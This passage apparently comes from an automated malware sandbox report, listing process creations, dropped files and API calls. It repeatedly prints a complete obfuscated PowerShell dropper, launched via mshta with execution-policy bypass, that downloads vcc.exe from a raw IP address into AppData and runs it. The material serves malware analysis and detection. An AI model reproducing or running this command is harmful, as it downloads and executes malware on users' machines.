Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Suspicious command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00034B37 LoadLibraryA,GetProcAddress,11_2_00034B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_045C42D9 push ebx; ret 3_2_045C42DA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_045C3BCA pushfd ; retf 3_2_045C3BD9
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0003C508 push A30003BAh; retn 0003h11_2_0003C50D
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00058945 push ecx; ret 11_2_00058958
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\vcc.exeJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_000348D7
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_000B5376
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00053187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00053187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
